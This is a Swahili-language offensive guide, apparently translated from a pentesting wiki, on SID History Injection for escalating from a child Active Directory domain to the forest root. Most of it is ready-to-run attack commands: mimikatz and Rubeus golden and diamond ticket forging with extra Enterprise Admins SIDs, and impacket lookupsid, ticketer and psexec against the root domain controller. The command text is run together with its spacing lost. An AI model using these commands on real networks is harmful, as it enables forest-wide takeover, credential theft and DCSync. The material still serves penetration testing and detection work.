Lengo la SID History Injection Attack ni kusaidia uhamaji wa watumiaji kati ya maeneo huku ikihakikisha upatikanaji wa rasilimali kutoka eneo la zamani. Hii inafanywa kwa kujumuisha Kitambulisho cha Usalama (SID) cha mtumiaji wa zamani katika Historia ya SID ya akaunti yao mpya. Kwa kuzingatia, mchakato huu unaweza kudhibitiwa ili kutoa upatikanaji usioidhinishwa kwa kuongeza SID ya kundi lenye mamlaka ya juu (kama vile Wataalam wa Biashara au Wataalam wa Eneo) kutoka eneo la mzazi hadi Historia ya SID. Ukatili huu unatoa upatikanaji wa rasilimali zote ndani ya eneo la mzazi.
Njia mbili zipo za kutekeleza shambulio hili: kupitia uundaji wa Golden Ticket au Diamond Ticket.
Ili kubaini SID ya kundi la "Enterprise Admins", mtu lazima kwanza apate SID ya eneo la mzazi. Baada ya kutambua, SID ya kundi la Enterprise Admins inaweza kuundwa kwa kuongeza -519 kwenye SID ya eneo la mzazi. Kwa mfano, ikiwa SID ya eneo la mzazi ni S-1-5-21-280534878-1496970234-700767426, SID inayotokana kwa kundi la "Enterprise Admins" itakuwa S-1-5-21-280534878-1496970234-700767426-519.
Unaweza pia kutumia vikundi vya Domain Admins, ambavyo vinamalizika kwa 512.
Njia nyingine ya kupata SID ya kundi la eneo lingine (kwa mfano "Domain Admins") ni kwa kutumia:
mimikatz.exe"kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi""exit"/useristheusernametoimpersonate (could beanything)/domainisthecurrentdomain./sidisthecurrentdomainSID./sidsistheSIDofthetargetgrouptoaddourselvesto./aes256istheAES256keyofthecurrentdomain's krbtgt account.--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option/startoffset sets the start time of the ticket to 10 mins before the current time./endin sets the expiry date for the ticket to 60 mins./renewmax sets how long the ticket can be valid for if renewed.# The previous command will generate a file called ticket.kirbi# Just loading you can perform a dcsync attack agains the domain
Kwa maelezo zaidi kuhusu tiketi za dhahabu angalia:
# Use the /sids paramRubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500/groups:512/sids:S-1-5-21-378720957-2217973887-3501892633-512/krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap# Or a ptt with a golden ticketRubeus.exe golden /rc4:<krbtgt hash>/domain:<child_domain>/sid:<child_domain_sid>/sids:<parent_domain_sid>-519/user:Administrator /ptt# You can use "Administrator" as username or any other string
Kwa maelezo zaidi kuhusu tiketi za almasi angalia:
# This is for an attack from child to root domain# Get child domain SIDlookupsid.py<child_domain>/username@10.10.10.10|grep"Domain SID"# Get root domain SIDlookupsid.py<child_domain>/username@10.10.10.10|grep-B20"Enterprise Admins"|grep"Domain SID"# Generate golden ticketticketer.py-nthash<krbtgt_hash>-domain<child_domain>-domain-sid<child_domain_sid>-extra-sid<root_domain_sid>Administrator# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING# JUST USE THE SAME USERNAME IN THE NEXT STEPS# Load ticketexport KRB5CCNAME=hacker.ccache# psexec in domain controller of rootpsexec.py<child_domain>/Administrator@dc.root.local-k-no-pass-target-ip10.10.10.10